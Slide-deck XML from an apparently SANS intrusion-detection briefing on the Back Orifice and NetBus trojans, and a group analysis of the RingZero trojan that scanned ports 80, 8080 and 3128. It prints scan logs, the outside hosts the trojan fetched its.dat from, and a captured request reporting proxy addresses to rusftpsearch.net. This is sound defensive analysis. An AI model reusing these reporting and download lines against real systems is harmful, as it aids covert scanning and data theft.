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26B8-B4E6-4551-ADBF-72694BD4A71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Stephen Northcutt and today we are going to discuss some of the common attacks levied against individuals and organizations who are on the Internet.  Though this is a tool oriented technology brief, I would like to state one thing up front, tools are not attacking your sites, people are.  There are a large number  of loosely organized skilled individuals across the Internet who are focused on building and using attack tools to take over systems and use them for their own purposes.  We will demonstrate that these attacks range from your home computer connected to your ISP all the way to the largest and most advanced organizations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he most out of this briefing you should have completed IP Concepts and IP Behavior, however we will explain the material as we go.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ublic safety announcement.  We are going to mention several tools during this talk and even provide URLs for some of these so that you can use them to test these techniques out yourself.  Keep in mind that you could end up in trouble if you misuse the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one lesson I should have learned by now it is to always test attack tools in a lab environment, never on a live network.  Over the years I have been amazed at how well I can break networks simply by scanning them.  Needless to say the owners of the networks are not always overjoyed, and it is a great insurance policy to be able to demonstrate that I tested them in a lab BEFORE I let them loose on a live, production network.  Also,  please, only test on your own network, don’t probe systems that you do not own.  People really do get fired or even prosecuted, be certain to have permission before testing any attack or scanning to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isclaimer, I don’t possess the artsy skills to edit the bit map on this screen to change the Internet address of the attacker to a private address.  So as they say in novels any resemblance to ia real nternet address is purely coin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st common, or well known trojans are Back Orifice and Netbus, there are plenty others and variations of these, but they will serve to frame our discussion.  The most common infection vector is when an unsuspecting users opens an attachment that inserts the trojan onto their hard disk and into their operating system.  This is similar to a virus.  The trojan serves as a beachhead, an open door to compromise the system.  Now the attacker has to find the trojan.  Every week, I get reports from folks who have detected attackers scanning for these troj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t on your slide is from a wonderful program called Back Officer Friendly by the folks at NFR (www.nfr.net).  I wanted to use this because was detected by my friend Roland, on his </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> computer.  Roland was a student in my intrusion detection classes at SANS and he went back and installed nuke nabber at work and home and discovered, mirable dictu, folks were probing his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 slide is an additional trace caught by Roland’s home system.  This brings up an important point.  The attackers share information with one another.  If we do not share they have a major advantage.  If you are willing to share an attack trace, please send email to info@sans.org with intrusion in the subject line. Before we move to NETBUS, I would like to emphacize that your home computer system is also at risk, attackers sweep the ISP dialins looking for vulnerabl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19:31:10    BO PING sweep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4    BO TYPE_SYSLISTPASSWORDS attemp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9    BO TYPE_SYSENDKEYLOG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9    BO TYPE_FILEDELETE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reen shot you see is the result of the netbus trojan.  You can see some of the commands that you can issue to the infected system.  They being able to send arbitrary text, play sounds, turn on the system’s microphone to spy on what is being said and my personal favorite, opening the CDROM door a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bus establishes a TCP connection and this can remain active for a long time during periods  of low level acti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view the material on trojans, the most common infection vector is by email.  An unwitting individual opens an attachment and then they have the active trojan.  However, the attacker still has to find the system, unless they had a way of being certain which system is infected.  This is the reason there is a lot of scanning activity looking for trojans.  The two well known trojans netbus and back orifice have equally famous default ports of 12345 and 31337, but they can exist at other ports and there are a large number of trojans including variations of these.  Most recently we have been evaluating scans that appear to be looking for trojans, but are using a variety of destination ports making it more difficult to write a filter for these s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od news is that with reasonable precautions you can defend your systems!  The major anti-virus software packages are quite good at locating and cleaning trojans.  Also, I strongly recommend you consider the use of personal firewalls, several of these are listed on the slide.  That concludes our section on trojens, we will not take a look at some additional scanning and exploit tools that have obvious network signatures.  However, first we should review the format of a network tr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195C6-FFB0-4B9E-A6D7-AFD228147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F31AB-E2CF-493F-8134-A5DF750A7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63BBE-036B-4161-A1A2-ECC66925D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A7342-C29D-4B4E-B864-13F66877D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6599B-C295-452E-B217-317B5ABB2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25C32-2B02-4917-ADF4-64C4818B5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78C57-1356-4108-B432-C8E2BF0ED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AE80B-A841-4D9F-A4B5-18DE70703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9A9EB-A9A7-4B65-8A34-EB32199D8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34268-378B-4140-A5B7-2C6D78787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DA73E-D0A0-4F7C-8BC4-E0FC30017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757C-4DF3-4F05-9797-9BAFE63C8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outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="653760" indent="-251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cond Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="10058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Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="140796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ourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"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fth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="5"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xth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="6"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venth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="152280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ffbf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438960"/>
            <a:ext cx="9144000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="ffbf00"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="ffbf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2898000" y="6400800"/>
            <a:ext cx="34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he Hunt for RingZero</a:t>
            </a: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0009-E5ED-4894-8617-7054ED1F9959}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffcc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Hunt For</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="6000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>RingZero</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="4572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Green</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>jegreen@crosslink.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xy Scanning</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459720" y="2590560"/>
            <a:ext cx="81925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5 ghostrid3r.1606 &gt; 192.168.2.1.80: S(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6 ghostrid3r.1607 &gt; 192.168.2.1.8080: S(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7 ghostrid3r.1609 &gt; 192.168.2.1.3128: S(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Big Is This Thing?!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369720" y="1979640"/>
            <a:ext cx="8133120" cy="3143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usion detection systems ranging from home computers with c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ms to high end government facilities have been reporting a lar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ber of probes to TCP port 3128, the squid proxy service.  If yo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 has a network monitoring capability and you DO NOT run squi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you detect this pattern over the next two weeks, please let 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 by sending email to info@sans.org with intrusion 3128 in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ject line.  If you are allowed to send the data trace, pl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nitize any of your site's network information (destination h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ress) and send the data trace as well.  Thank yo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3439080" y="5104440"/>
            <a:ext cx="20736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rPr>
              <a:t>BIG!</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 300 3128 Messages</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>In Three Days</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-47160" y="2511360"/>
            <a:ext cx="9214920" cy="2864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23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;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23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;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23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;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23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;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23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;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23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;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23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;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23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;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7;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;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8;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;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23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;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23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1229760" y="5485320"/>
            <a:ext cx="66103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 1000 Source Ho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Are The Possibilities?</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>&gt; 1000 Source Hosts</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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rPr>
              <a:t>Spoofed</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-343080">
              <a:spcBef>
                <a:spcPts val="9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rPr>
              <a:t>Worlds largest coordinated attack</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ojan software or “malwa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urce Host Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361080" y="2282040"/>
            <a:ext cx="8439480" cy="33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am almost certain that these are indeed live, non-spoof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s.  First, I've dumped the tcpdump traffic with the arriv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L values.  I've done about a dozen traceroutes back to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IP's and the hop counts are believably close.  Als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lues found in the tcpdump output itself appear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to different hosts or a very wise craf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dy Novak - AR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First Hot Tip - Sept 23</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471600" y="4494240"/>
            <a:ext cx="81864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 http://www.rusftpsearch.net/cgi-bin/pst.p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st mode = writeip&amp;pst host=192.168.2.1&amp;pstport=3128</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520560" y="2132280"/>
            <a:ext cx="8079480" cy="25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 began receiving probes to 3128 on Wednesday, September 15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es come in a triplet - first to TCP port 80, then 80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3128.  The probes appear to be going after random addres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finally hit a web server listening on port 80 so I got to s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t was doing.  It sent the following request to the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onym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1157040" y="5684040"/>
            <a:ext cx="6567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r verified by four other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 What?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="2365560"/>
            <a:ext cx="861048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Just a couple additional pieces of information.  I only probed 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rather simple way about 5 machines and found none of th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ning finger, SMTP or FTP, though all were running TCP port 13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 concluded (with a very small sample size) it was a Wind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 of some kind, though I admit this is a guess based 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tchy in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onymo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ame Over?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374760" y="2365560"/>
            <a:ext cx="8375400" cy="2838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am the Network Security Officer at Vanderbilt University.  I have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that was infected with a trojan called RingZero and was scan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orts 80, 8080, and 3128.  I have pieces of the code specifically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alled its.exe and a file that was Ring0.vxd.  I am still try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the original infected file and I suspect that it was a scre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r.  If you would like more info give me a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n Marcum, Vanderbi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xtreme</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> BoF -</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Decoding RingZero</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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7PM - 2AM</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y Thanks To All Involve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Game Plan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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ve the Vanderbilt files to a “safe” platform for examination</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e strings and other unix utilities to examine the files</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ing mechanism was a primary interes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tline</a:t>
            </a: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7772400" cy="306072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word about Trojans</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ting a clue</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for data</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source hosts?</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hunt for the Trojan</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me over</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F Findings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533520" y="1676520"/>
            <a:ext cx="8076960" cy="152280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="ffbf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1 - Gameplan Deviation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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ings, etc didn’t get us too far</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ingZero uses Ian Luck’s “Petite” program to compress the executables</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im White volunteers to sacrifice his windows laptop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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2 - Deliberate Infection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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ed a mini-network</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 computers, both running sniffers</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zipped the archive</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wo files:  its.exe, pst.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="676080" indent="-259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was a “coin-to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3 - Examining ITS.EXE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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its.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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oved itself from the desktop</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exe and Ring0.xvd placed in \windows\system directory</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d an empty its.dat file</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network activity…..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ffic At Last!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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fter rebooting, the infected machine started doing DNS queries for hosts named:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="329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hzforum.virtualave.net</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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xoom.members.com</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="329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ow we’re getting somewhe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 What Now?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahom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ed an entry in the infected machine’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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ve it the ip address of the sniffer</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ected machine started sending web requests on port 80</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s 4 and 5 - Reconfiguring the Sniffer Machine</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahom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tched to Linux</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Apache and tcpdump</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ache logs showed that its.exe was trying to retrieve an its.dat file from the webservers</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zforum.virtualave.net/its.dat</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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oom.members.com/harmer/its.d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Should Be In ITS.DAT?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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dat no longer existed on phzforum.virtualave.net</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="18925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rminal room closed before we discovered the xoom.members.com connection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="18925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dat was found the following morning, but it is encryp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rty Over? - Nope!</a:t>
            </a:r>
            <a:endParaRPr b="0"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tting very late</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ak Room closed</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maining BoF members relocated to a corner, downstairs in LaSall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s 6 and 7</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> Running The PST.EXE File</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113"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PST.EXE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="335880" indent="-335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itial behavior was the same as the its.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="727920" indent="-280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ocated itself, etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="2016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ST.EXE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>spewed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> packets to </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>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s 80, 8080, and 3128!</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ST.EXE Behavior</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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nerated a small list of “random?” IP addresses</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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canned all IPs for port 80, then 8080, and finally 3128</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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eate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ojans</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="bo" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1676520"/>
            <a:ext cx="9144000" cy="3809880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645120" y="5713560"/>
            <a:ext cx="77428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Roland’s home computer, connected to an I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It Doing Though?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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nce the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan.</a:t>
            </a:r>
